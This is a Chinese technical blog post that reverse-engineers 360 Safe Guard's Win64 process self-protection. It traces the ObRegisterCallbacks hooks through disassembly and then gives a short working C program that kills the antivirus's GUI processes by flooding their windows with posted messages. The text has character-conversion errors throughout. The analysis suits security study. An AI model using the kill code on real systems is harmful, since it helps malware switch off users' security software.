淺析360在系統的進程自保護及突破

自從改行玩硬件後，就不多關注病毒和反病毒之間的鬥爭了。某天在中關村論壇聽到一
名網友說 360在WIN64 上有了進程自我保護，萬分牛逼，連微軟的Process Explorer都不
能結束呢！我聽後內心十分好奇，因而重操舊業，下載了最新版本的360 安全衛士7.7版本
（2011-5-6），安裝在64位 Windows 7虛擬機上來測試。
   首先拿「任務管理器」來測試，果真再次出現了熟悉的「拒絕訪問」提示：

 

   而後嘗試用用重載NTDLL + ZwGetNextProcess得到句柄，發現NTSTATUS的返回值老是
失敗。後來發現OpenProcess能夠在低權限下（好比以查詢進程信息的權限
PROCESS_QUERY_INFORMATION）打開360 的進程，可是想用DuplicateHandle或者
NtDuplicateObject來得到同一進程的最高權限句柄時就失敗了。而後又對線程如法炮製，
依然失敗。最後用無句柄殺線程的絕招，連KiInsertQueueApc鉤子都抵擋不住的 10 萬次
PostThreadMessage，仍是失敗。初步測試，發現來者不善，決定先用IDA Pro 5.5分析一
下 360的驅動，再想辦法。
  首先用 Win64AST（Win64下的系統工具，有查看內核模塊，管理進程等功能，

查看 360加載的驅動：

   能夠發現，360 在Win64 系統上只加載了兩個驅動：360FsFlt.sys和一個網絡相關的驅
動。其中，360FsFlt.sys從名字上來看是文件系統過濾驅動。經分析，在它的裏面有進程
自我保護相關的內容。
   在作理智的分析以前，咱們能夠先進行猜想，猜想一下360會用什麼手段來實現進程自
我保護。第一種方法是Ring 3 的 Inline Hook，雖然安全穩定，可是容易繞過。上次我雖
然有篇文章講解如何反繞過Ring 3 Inline Hook，可是畢竟判斷方法還有必定的瑕疵。所
以我判定，360不會這麼作。第二種方法就是廢掉Win64的PatchGuard機制，對內核函數
進行 Inline Hook，雖然這種方法最好，可是我確定360也不會這麼作。由於360 是一個商
業軟件，這種方法穩定性差不說，並且還會給競爭對手以「破壞系統安全機制」的口實。所
以惟一的多是第三種方法，既微軟官方推薦的方法：用ObRegisterCallbacks註冊一個回
調，監控系統中全部的進線程句柄的動態，一旦發現對本身有害的句柄，立刻就把句柄關閉
並返回一個錯誤值。在用IDA 的分析中，果真證明了個人猜想。
  首先把360FsFlt.sys拖入 IDA進行反彙編，而後把點擊「Imports」，找到
ObRegisterCallbacks，而後雙擊ObRegisterCallbacks，進入和IDA VIEW-A界面，而後雙
擊 SUB_1D938，就進入和反彙編代碼的界面。什麼？您想按F5查看 C代碼？呵呵。真的不
好意思，64位的 IDA 不帶把彙編代碼變成C代碼的插件，只能委屈各位看觀看晦澀的64位彙編

代碼了。順便說一句，我以爲IDA對 64位 BIN文件作的反彙編不怎麼正確，可是沒什
麼確實的證據，因此仍是不要亂說爲好。
你們能夠看到，在調用ObRegisterCallbacks以前，還往 rax 寄存器裏放了兩個你們十
分熟悉的對象類型：PsProcessType和 PsThreadType，所以能夠很確定地說，360 就是用
ObRegisterCallbacks註冊了一個回調，用來監視進程類型句柄和線程類型句柄的動態！截
圖以下： 

完整的反彙編以下：  
;int __fastcall sub_1D938(PDRIVER_OBJECT DriverObject, __int64)
sub_1D938 proc near
arg_0= qword ptr 8
mov [rsp+arg_0], rbx
push rdi
sub rsp, 20h
mov rax, cs:PsProcessType
mov rbx, rcx
lea rdx, qword_ABA20
mov cs:qword_34300, rax
mov rax, cs:PsThreadType
lea rcx, unk_342D8
mov cs:qword_34320, rax
lea rax, qword_34300
mov cs:qword_342F8, rax
call cs:ObRegisterCallbacks
mov rdx, cs:qword_ABA20
xor edi, edi
cmp eax, edi
movzx eax, cs:byte_59E12
cmovl rdx, rdi  
test byte ptr cs:dword_59ED8, 4
lea ecx, [rdi+1]
cmovnz eax, ecx
mov cs:qword_ABA20, rdx
mov cs:byte_59E12, al
mov eax, cs:dword_59ED8

test al, 8 jz short loc_1D9D6 xor edx, edx ; __int64 mov rcx, rbx ; DriverObject call sub_1E710 cmp eax, edi mov eax, cs:dword_59ED8 setnl cs:byte_59E13 loc_1D9D6: test al, 10h jz short loc_1D9EF mov rcx, rbx ; DriverObject call sub_2350C cmp eax, edi   setnl al mov cs:byte_59E14, al jmp short loc_1D9F5 loc_1D9EF: mov al, cs:byte_59E14 loc_1D9F5: cmp cs:byte_59E13, dil   jnz short loc_1DA03 cmp al, dil jz short loc_1DA3A loc_1DA03: lea rax, qword_5A2B8 lea rcx, [rbx+70h] loc_1DA0E: cmp [rax-0E8h], rdi jnz short loc_1DA1C cmp [rax], rdi jz short loc_1DA26 loc_1DA1C: lea rdx, sub_1D888 mov [rcx], rdx loc_1DA26: lea rdx, unk_5A390 add rax, 8 add rcx, 8 cmp rax, rdx jle short loc_1DA0E loc_1DA3A: call sub_1D4A0 lea rcx, sub_1D660 xor edx, edx mov rbx, [rsp+28h+arg_0] add rsp, 20h pop rdi jmp cs:PsSetCreateProcessNotifyRoutine sub1D938 endp 我還找了找360實現進線程自保護的過程，可是能力有限，只找到一部分實現[進程自 保護]的過程，沒有找到實現[線程自保護]的過程。若是讀者有興趣，能夠本身找找：  ; Maybe Protect Process ; int __cdecl sub_18294(HANDLE Handle, char) sub_18294 proc near var_58= qword ptr -58h var_50= byte ptr -50h var_48= qword ptr -48h var_38= byte ptr -38h var_10= qword ptr -10h Handle= qword ptr 8 arg_8= byte ptr 10h mov rax, rsp mov [rax+8], rcx push rbx sub rsp, 70h xor ebx, ebx mov r10, rdx mov [rax+8], rbx   cmp rdx, rbx jz loc_1834F mov rax, cs:qword_59F10 cmp rax, rbx jz short loc_182C8 mov rcx, rdx call rax ; qword_59F10 jmp loc_18351 loc_182C8: lea rax, [rsp+78h+Handle] mov r9d, 80000000h xor r8d, r8d mov [rsp+78h+var_48], rax mov rax, cs:PsProcessType mov [rsp+78h+var_50], bl mov rcx, [rax] mov edx, 200h mov [rsp+78h+var_58], rcx mov rcx, r10 call cs:ObOpenObjectByPointer cmp eax, ebx   jl short loc_1834F mov rcx, [rsp+78h+Handle] lea rax, [rsp+78h+arg_8] lea r8, [rsp+78h+var_38] mov r9d, 30h xor edx, edx mov [rsp+78h+var_58], rax call ZwQueryInformationProcess mov rcx, [rsp+78h+var_10] cmp eax, ebx cmovl rcx, rbx mov [rsp+78h+var_10], rcx mov rcx, [rsp+78h+Handle] ; Handle call cs:ZwClose mov rax, [rsp+78h+var_10] jmp short loc_18351 loc_1834F: xor eax, eax loc_18351: add rsp, 70h pop rbx retn sub_18294 endp 我以爲此函數的邏輯是這樣：傳入進程對象指針PEPROCESS （注意：我強烈以爲不是IDA 提示的 HANDLE 類型，而是PEPROCESS 類型。由於對於計算機看來，二者都是指針，沒有任 何差異），而後利用ObOpenObjectByPointer得到進程的句柄，利用 ZwQueryInformationProcess得到進程PID，接着對比是否爲要保護的進程，而後返回對比  結果。至於關閉[由別的程序打開的][被保護進程的句柄]，返回拒絕訪問等操做，並不在這 一過程（這句話很拗口，請多讀幾回）。至於這個驅動是怎麼保護線程的，我有本身的猜測 但並不肯定，由於我並無在反彙編代碼中找到ZwQueryInformationThread（可是找到了 IoThreadToProcess）。有俗語云「騙得了別人騙不了本身」，因爲沒有造成讓本身信服的邏 輯，因此不敢信口開河，誤導讀者。 知道了 360如何自我保護，攻破這套防護體系就簡單了：利用窗口攻擊便可。由於在 360 的驅動裏沒有防護窗口攻擊的代碼。準確地說，是微軟沒有提供解決窗口攻擊官方解決 方案。至於窗口攻擊的手段，用EndTask便可（你們能夠試試用「任務管理器」的「結束任 務」來結束360safe.exe的主窗口），用SetWindowLong或 SetParent也能夠。不過我用的 是EnumWindows + PostMessage的方案。代碼很短，只有短短40行，可是對付360safe.exe 和 360tray.exe均可以：   #include <stdio.h> #include <Windows.h> #pragma comment(lib,"user32.lib") HWND hWnds[8192]={NULL}; DWORD dwCount=0; UINT EnumWnd(HWND h, LPARAM Param) {     if (dwCount>=8192)         return 0;

    hWnds[dwCount] = h;     dwCount++;     return 1; } VOID KillGuiProcess(DWORD dwProcessId) {   DWORD pid=0;     EnumWindows((WNDENUMPROC)EnumWnd, 0);     for(UINT i=0;i<dwCount;i++)     {         GetWindowThreadProcessId(hWnds[i], &pid);         if(pid==dwProcessId)          {             for(UINT j=0;j<0x1000;j++)                 PostMessageA(hWnds[i],j,0,0);         }     } } int main() {     DWORD pid=0;     printf("Input 360 PID: ");     scanf("%ld",&pid);     KillGuiProcess(pid); //特別聲明：只對360在 Win64的自保護有效！！！     return 0; }  你們還能夠看到，個人函數名是KillGuiProcess，也就是說對非GUI 程序無效。經測 試，確實對沒有界面的ZhuDongFangYu.exe無效。可是不是說咱們就沒有辦法對付 ZhuDongFangYu.exe了呢？答案是否認的，不過要用點強制手段了。這裏先留下個謎團，借 評書人的經常使用的語句來結束本文：欲知後事如何，請聽下回分解。